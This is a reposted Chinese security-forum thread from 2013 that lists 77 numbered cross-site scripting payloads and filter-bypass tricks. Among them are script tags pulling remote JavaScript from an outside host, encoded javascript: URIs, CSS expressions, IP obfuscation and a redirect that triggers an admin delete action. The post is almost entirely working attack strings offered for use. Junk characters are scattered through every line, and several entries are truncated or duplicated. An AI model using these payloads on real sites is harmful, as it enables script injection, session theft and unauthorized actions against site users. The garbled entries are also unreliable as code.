找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2579|回复: 0
打印 上一主题 下一主题

XSS攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-19 19:22:37 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
: O! K8 @4 N: F5 C2 J* l  q0 h(1)普通的XSS JavaScript注入
5 \/ m" A& L$ M<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
. v" o, C" x- F5 N(2)IMG标签XSS使用JavaScript命令: G1 a5 g* V) }, p0 J( S3 |
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
; L. ]) S$ [1 a(3)IMG标签无分号无引号
, V! \& F" q% K9 z<IMG SRC=javascript:alert(‘XSS’)>& r0 Q; C. z# n' e
(4)IMG标签大小写不敏感7 _$ d% w3 C' `+ F
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
9 Z- K# v* ~: O2 n' d2 R+ l5 U(5)HTML编码(必须有分号)
+ k) V0 p/ [2 l& M: J<IMG SRC=javascript:alert(“XSS”)>
4 m! e% C- Q7 w' x. l(6)修正缺陷IMG标签
1 i" D$ K  W# O6 {$ z7 Y2 _  k<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>7 [: O7 }' }$ y
0 }/ {2 R4 X# B4 A. j* ~1 {

/ c, {* N& e# S5 B( q(7)formCharCode标签(计算器)+ B1 z4 q5 I; X, b1 D% y4 R' B
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
( D4 z! d) X  K+ W/ j' ^8 m7 Z% T- @5 [(8)UTF-8的Unicode编码(计算器)
$ l* r. M) q. @  S& |! g! M6 S<IMG SRC=jav..省略..S')>
2 Q* I& k$ N' h  U# R* t* l" z" Z1 u(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
1 H) T4 }: B6 w2 u<IMG SRC=jav..省略..S')>" N7 e; s! \: z
(10)十六进制编码也是没有分号(计算器)8 e) H0 i$ W5 p2 o& j  [
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>( p$ E$ Y) Z3 I% Y) a$ G- e# S  `
(11)嵌入式标签,将Javascript分开
) T! g+ E, |9 r" ~" Q<IMG SRC=”jav ascript:alert(‘XSS’);”>
6 ]% {9 A( X" B2 ^2 m8 {(12)嵌入式编码标签,将Javascript分开
* C7 c# A& U' l9 q3 ?<IMG SRC=”jav ascript:alert(‘XSS’);”>" }. [) g/ }4 l8 L
(13)嵌入式换行符
5 M. Y# y9 k  h2 R6 ^<IMG SRC=”jav ascript:alert(‘XSS’);”>6 D+ \, a% o# Q3 X5 ]. ?! `1 U
(14)嵌入式回车, Y4 u7 U/ o/ W) C
<IMG SRC=”jav ascript:alert(‘XSS’);”>/ F! T& ^3 o, |8 U
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
" ~4 P8 g( `9 X' b7 M5 E" h6 d8 f, ]<IMG SRC=”javascript:alert(‘XSS‘)”>
3 X; g% o2 C$ M  c4 v% L9 L- g) Z(16)解决限制字符(要求同页面)0 X7 S$ o0 M& G# _) |1 R7 _3 V
<script>z=’document.’</script>2 R' T) c; }  z+ e
<script>z=z+’write(“‘</script>
0 J6 s4 j; T  ~* }; a5 H4 N<script>z=z+’<script’</script>
5 v5 A+ o+ I) O3 H4 v$ y<script>z=z+’ src=ht’</script>
, B0 ~  ]9 T3 v. G7 ~/ C<script>z=z+’tp://ww’</script>3 D; [7 q/ ^$ s  V
<script>z=z+’w.shell’</script>
: H" m" m# j1 ~6 y6 R2 Y<script>z=z+’.net/1.’</script>
- D! R7 q! @/ x4 z# u( D7 h<script>z=z+’js></sc’</script>
( k0 H6 _' ^( T+ H9 a, d4 k$ V9 _<script>z=z+’ript>”)’</script>
) ?& b3 A2 @* j; O# X! L- W: p) b2 A<script>eval_r(z)</script>1 _: X' D3 S) P
(17)空字符12-7-1 T00LS - Powered by Discuz! Board( `" L! f0 w. v8 X$ S; ]: G! ^  h
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
1 B9 r$ ]  e3 U7 W! ]2 Rperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
/ k) L0 W2 l5 J  Q) U& A(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
8 ]- \, W: J7 Dperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
9 r1 M! v1 \9 c+ S% M# N(19)Spaces和meta前的IMG标签
" \. z& A. d; d  B! D+ _- ]* g0 p  c6 {% Y<IMG SRC=” javascript:alert(‘XSS’);”>% j" z; R* D7 J6 d) ?/ ?) t
(20)Non-alpha-non-digit XSS
$ t4 ^0 F0 u# G# q. |& K. h) }, D* Y<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
( v/ {- R+ E7 `+ T! z(21)Non-alpha-non-digit XSS to 2
5 j# _! ?5 B. t  C  o<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>+ a& B, s; g; Q
(22)Non-alpha-non-digit XSS to 3
- O) ]1 d* r7 I. j* ?<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
% m) J" d7 N6 `# J( @(23)双开括号6 a' C8 a2 k5 J& E! |& m$ R
<<SCRIPT>alert(“XSS”);//<</SCRIPT>: O- k# _- y& [) m7 [+ V) f5 ^
(24)无结束脚本标记(仅火狐等浏览器)& j7 [$ s! p/ S5 ^; k  K
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>& j! \# o# I8 s# [1 w6 O; S$ g6 t
(25)无结束脚本标记22 F" {0 V- o, }6 V* T0 V% ?* T) g
<SCRIPT SRC=//3w.org/XSS/xss.js>" a) I9 S3 U' |) l8 L
(26)半开的HTML/JavaScript XSS
5 M2 }. s( w4 J% T( z: {<IMG SRC=”javascript:alert(‘XSS’)”
2 U9 |( m) `4 J( z(27)双开角括号
, o) i0 Z. o' t4 j1 H, H$ B2 v<iframe src=http://3w.org/XSS.html <* i5 T$ c; f( f! `, H+ q% h
(28)无单引号 双引号 分号$ }' D6 j% D$ M9 _( u5 ~! a
<SCRIPT>a=/XSS/; B  A. o. V) P7 w/ X) [9 H; m" X6 h
alert(a.source)</SCRIPT>! Z5 A5 b% P; I5 Z3 y/ o
(29)换码过滤的JavaScript
/ j7 K+ e; B: c\”;alert(‘XSS’);//1 x$ k: w' Z" F$ D" W+ s
(30)结束Title标签
5 @! w2 `1 \) P( ], t</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>& F& v: h" \" {- v. u! ~
(31)Input Image
7 i7 i$ _0 q5 x8 ~" [) _<INPUT SRC=”javascript:alert(‘XSS’);”>
) M- b8 B% R8 Q; L; z. O' k- j6 d; y(32)BODY Image
# o2 k9 C$ x# t+ S1 ]  t<BODY BACKGROUND=”javascript:alert(‘XSS’)”>( f; P4 q6 H3 `4 o" {# y
(33)BODY标签/ z5 [( ]! J+ C+ l5 w
<BODY(‘XSS’)>
0 t9 K6 n; K+ W1 I(34)IMG Dynsrc
3 g4 a* v& R* G9 @" ~1 g- p<IMG DYNSRC=”javascript:alert(‘XSS’)”>
% N5 S2 T$ I( \- }# d(35)IMG Lowsrc2 u4 h% u2 k! }5 i* c! i7 ?# f
<IMG LOWSRC=”javascript:alert(‘XSS’)”>* z7 @5 F! p8 r* e6 {
(36)BGSOUND% C& q9 e2 I  d; T4 f  x! ~
<BGSOUND SRC=”javascript:alert(‘XSS’);”>8 |) w$ f  |) _
(37)STYLE sheet: Z. }: Z, e# q' L- h. y
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>; ]- S# ]# _) E' n7 @4 G4 c' D" L1 t
(38)远程样式表
' r6 M- n" Y  N( d  r<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>, X$ a0 ^4 L+ G- o
(39)List-style-image(列表式)
: u* V, Y& z9 b! K# l* D! J<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
9 v8 Z* f9 q! \  g  N(40)IMG VBscript( z+ ]! U# Q; S" v  o1 j
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
7 T; B* o& _  a/ n(41)META链接url+ F- d; `  |5 h! }, L/ E
/ E( }8 {3 K  r" ^4 j, n$ Z

& d! \+ S# L5 I6 {" O<META HTTP-EQUIV=”refresh” CONTENT=”0;
5 O6 i  l5 H/ c8 `/ zURL=http://;URL=javascript:alert(‘XSS’);”>
1 z$ g, K* h+ u" s% E5 S3 j(42)Iframe% X* }* {7 t; |- k
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
, U( o' x% e- s9 `(43)Frame0 o! z; [: x; {) x8 `
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board3 @% j2 k) s# X& Z2 L% `$ u! E
https://www.t00ls.net/viewthread ... table&tid=15267 3/6/ c, b! H" j1 [  i6 O1 ?+ C% k( U# Y
(44)Table$ Z# R' J5 A. ~; Q$ m7 e
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>; ~1 q' V' W' ~; O# q6 B0 P
(45)TD
+ o5 c8 D6 ^  s9 Y  j7 c/ B<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>* S; v% x; G; g2 b& a4 \7 m, c
(46)DIV background-image
) K. J- m9 b$ C" V/ _5 a# s<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>  ^1 w5 k" y" A) P) x% x3 p
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
$ y' I* C1 R' p3 m- r6 h' v" \8 Q8&13&12288&65279)
& F' ]& J8 p" i6 ]<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>% ^6 L4 }, i2 R$ \( i0 r8 ?
(48)DIV expression9 A* _+ P1 F) [4 |8 b
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
$ @5 P* \: I% V9 L(49)STYLE属性分拆表达+ C) z6 L- I2 y3 J3 _
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>( ?/ C4 j- P9 W: y' Z2 P6 U
(50)匿名STYLE(组成:开角号和一个字母开头)- h1 H: f- U% e# u0 Z
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
% M& M' a9 N* m* I(51)STYLE background-image8 {/ l4 g/ O3 ~% @# t9 y
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A# s8 P, h0 _: n  g0 l6 F
CLASS=XSS></A>% I6 _" C  z  G' [. M
(52)IMG STYLE方式
1 |% S3 Q: @  g* O% kexppression(alert(“XSS”))’>
& C2 c6 e) M- M" W6 a(53)STYLE background
9 w5 i' F, w& G( I<STYLE><STYLE
; M7 c( k/ f/ a3 _( j6 h0 ?5 `/ A( ^+ etype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>) k) `# d- }2 Q
(54)BASE- B) u5 O  k" a# o
<BASE HREF=”javascript:alert(‘XSS’);//”>/ \6 g, l2 r0 e6 e
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS9 [* J4 S) U7 m. H
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>9 y" q6 t1 P* [! P: F. X
(56)在flash中使用ActionScrpt可以混进你XSS的代码' }% a# X% W) \* Y- A
a=”get”;# T: Y2 G1 n0 @& o4 g% s# S
b=”URL(\”";9 X7 a: s. S, e# ~& x
c=”javascript:”;" }2 O7 w+ g+ S9 H: e/ E' l
d=”alert(‘XSS’);\”)”;: ]% u9 m, @  C* l
eval_r(a+b+c+d);
8 l- M; c9 H- V% C1 x( @$ n0 D(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上0 K# W7 B& H8 L
<HTML xmlns:xss>3 m7 {, f0 M: ], F1 m& k0 o; F' _
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
' p. h' u0 }. _0 \0 l- b) e( f<xss:xss>XSS</xss:xss>. e# U6 S5 l0 P  `
</HTML>
3 R3 ^0 X+ B1 q6 N: ?) S(58)如果过滤了你的JS你可以在图片里添加JS代码来利用5 l( w( Z0 x3 V7 `
<SCRIPT SRC=””></SCRIPT>7 y( L9 z) f- B% I" I
(59)IMG嵌入式命令,可执行任意命令
$ G' F+ h3 [) f$ P  \<IMG SRC=”http://www.XXX.com/a.php?a=b”>
  g: h, ?. u3 o7 A(60)IMG嵌入式命令(a.jpg在同服务器): a- D; f7 R, f, x$ O7 [
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
; z1 o; U! y, [+ ]' o(61)绕符号过滤
1 n- S) D2 ?9 l<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>! [/ ~. Z+ f8 `( u" l6 o' ?
(62)* T, x% u6 e7 @" S3 q' ]* @- c
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
8 C% i5 }6 Z. e/ u: h4 q(63)
# E4 T$ f. a! L  U8 @9 K: ]- F* X<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
- J) h8 V5 M; l(64)& Z2 A4 p1 Z) C5 i/ f6 _' [
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>& a! D8 y3 k# i9 H
(65)- H: o' r, U8 p/ a$ H! c
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
+ N! i% W. s, C$ i(66)12-7-1 T00LS - Powered by Discuz! Board
* v; k7 v% p" T% t. H& o; `https://www.t00ls.net/viewthread ... table&tid=15267 4/6
" F6 B+ W+ D* N9 L8 e0 b4 t<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>* N1 N. W4 K. y$ s
(67)
) V! v6 u) W+ c) a7 \+ }<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>; {( ^2 I8 X0 n6 c) s6 e
</SCRIPT>
+ H& S) m6 h8 y: |9 Y4 y; A  M(68)URL绕行
0 {& f+ w9 R/ W0 t<A HREF=”http://127.0.0.1/”>XSS</A>
1 Y7 f- u. E1 o3 K& F9 f* h(69)URL编码
/ R- F& R/ {$ S; j) I* V8 }0 e<A HREF=”http://3w.org”>XSS</A>
" O" A* ^9 ?! m' W. w% @(70)IP十进制
! p8 x; m. s+ L$ C<A HREF=”http://3232235521″>XSS</A>
# {, p, V7 u" o% N- ](71)IP十六进制$ D5 g2 |/ O: D& W8 ~! C0 }
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>: u0 U2 W+ C& |; z$ W  P
(72)IP八进制7 Y7 a. x; N5 B* A% G
<A HREF=”http://0300.0250.0000.0001″>XSS</A>; X5 [- \1 R7 f3 {
(73)混合编码% W' z" Q6 O* C/ z9 H
<A HREF=”h* X( I: D9 D) K8 ?  E8 l, H: r
tt p://6 6.000146.0×7.147/”">XSS</A>
# Q3 f0 R$ [) g3 e(74)节省[http:]+ ?' Q( V$ ]$ C5 \" {  W. p$ ^9 ?
<A HREF=”//www.google.com/”>XSS</A>
% |+ Y' n% v8 o4 H. h2 R; n(75)节省[www]
1 R6 z; ]4 L9 l. t) C/ c<A HREF=”http://google.com/”>XSS</A>% t2 [. R" O) [9 J5 V+ [: }
(76)绝对点绝对DNS- ^( [/ o0 V+ @0 b0 D
<A HREF=”http://www.google.com./”>XSS</A>+ |' |9 R/ `, i* Q/ [( s/ P+ z- x
(77)javascript链接
; N9 a2 e8 w9 s  h) n/ `<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>. Y8 l5 h4 d; `4 R  y

. d, W9 t% |& X5 a3 i7 d$ X2 x原文地址:http://fuzzexp.org/u/0day/?p=14& [: w+ e2 n  J  E7 J& U

  z2 i+ i2 Y3 R
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表